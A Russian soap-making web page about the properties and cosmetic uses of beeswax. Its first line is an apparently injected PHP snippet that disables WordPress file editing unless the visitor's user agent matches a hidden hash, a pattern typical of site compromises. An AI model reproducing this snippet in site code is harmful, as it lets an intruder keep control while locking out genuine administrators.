if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Пчелиный воск натуральный | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Пчелиный воск натуральный

Пчелиный воск выделяется восковыми железами пчел и обладает смягчающим и противовоспалительным свойством

Ингредиенты для мыла - пчелиный воск Ингредиенты для мыла - пчелиный воск

Пче­ли­ный воск выде­ля­ет­ся вос­ко­вы­ми желе­за­ми пчел и обла­да­ет смяг­ча­ю­щим и про­ти­во­вос­па­ли­тель­ным свойством.

В кос­ме­ти­ке нату­раль­ный пче­ли­ный воск вхо­дит в состав отбе­ли­ва­ю­щих кре­мов, помад, масок. Пче­ли­ный воск явля­ет­ся вели­ко­леп­ным нату­раль­ным скра­бом (заса­ха­рен­ный мед, кста­ти, тоже). Он дели­кат­но отше­лу­ши­ва­ет омерт­вев­шие клет­ки кожи, очи­щая поры и устра­няя загрязнения.

Состав и свойства воска.

В момент выде­ле­ния вос­ка цвет его белый. Воск, вытоп­лен­ный из ново­от­сро­ен­ных сотов, тоже белый или свет­ло-жел­тый. Жел­ты­нй отте­нок вос­ка полу­ча­ет­ся при его сме­ши­ва­нии с про­по­ли­сом. Со вре­ме­нем соты тем­не­ют вслед­ствие насло­е­ния не-вос­ко­вых ком­по­нен­тов (экс­ре­мен­ты и коко­ны личи­нок, про­по­лис, цве­точ­ная пыль­ца и т.д.) Цвет вытоп­лен­но­го вос­ка зави­сит от вос­ко-сырья и от тех­но­ло­гии его полу­че­ния и пере­ра­бот­ки. При нагре­ва­нии и при сопри­кос­но­ве­нии вос­ка с метал­ли­че­ской тарой цвет его тем­не­ет. Путем хими­че­ско­го отбе­ли­ва­ния тем­ный воск мож­но сде­лать белым.

Нату­раль­ный пче­ли­ный воск обла­да­ет при­ят­ным медо­вым запа­хом. Этот аро­мат уси­ли­ва­ет­ся при нагре­ва­нии вос­ка. Воск, полу­чен­ный из недо­ста­точ­но каче­ствен­но­го сырья, изда­ет мер­вя­ный запах. Вос­ки, полу­чен­ные из высо­ко­ка­че­ствен­но­го сырья, или без­вкус­ны, или име­ют непри­ят­ный свое­об­раз­ный сла­бый при­вкус, осо­бен­но, осо­бен­но если они полу­че­ны из менее каче­ствен­но­го воско-сырья.

Воск име­ет кри­стал­ли­че­скую, зер­ни­стую струк­ту­ру, кото­рая осо­бен­но хоро­шо замет­на у свет­лых и дол­го хра­нив­ших­ся образ­цов. Кри­стал­ли­за­ция вос­ка зави­сит от тем­пе­ра­тур­но­го режи­ма. Фор­ми­ро­ва­ние зер­ни­сто­сти про­дол­жа­ет­ся и после охла­жде­ния вос­ка до ком­нат­ной тем­пе­ра­ту­ры, этот про­цесс длит­ся 3–4 меся­ца. В это вре­мя посте­пен­но нарас­та­ет твер­дость и элла­стич­ность вос­ка. Кон­си­стен­ция вос­ка харак­те­ри­зу­ет­ся твер­дой и плот­ной струк­ту­рой, кото­рая на холо­де ста­но­вит­ся хруп­кой. Отбе­лен­ный воск более мягок.

Тем­пе­ра­ту­ра плав­ле­ния вос­ка варьи­ру­ет от 60°C до 68°C, но надо отме­тить, что воск не пла­вит­ся при стро­го посто­ян­ной тем­пе­ра­ту­ре, а в интер­ва­ле око­ло 1°C. Экс­трак­ци­он­ный воск и воск, содер­жа­щий про­по­лис, име­ют более высо­кую тем­пе­ра­ту­ру плавления.

Тем­пе­ра­ту­ра засты­ва­ния от 60 до 67°C, но и она изме­ня­ет­ся в пре­де­лах выше­ука­зан­ных гра­ниц и обыч­но чуть ниже их.

Пче­ли­ный вокс явля­ет­ся неза­ме­ни­мым ком­по­нен­том при изго­тов­ле­нии баль­за­мов для губ, мас­ля­ных гид­ро­филь­ных пли­то­чек.  Так­же пче­ли­ный воск. исполь­зу­ет­ся в кре­мах, посколь­ку богат вита­ми­ном А и био­ло­ги­че­ски актив­ны­ми веществами.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!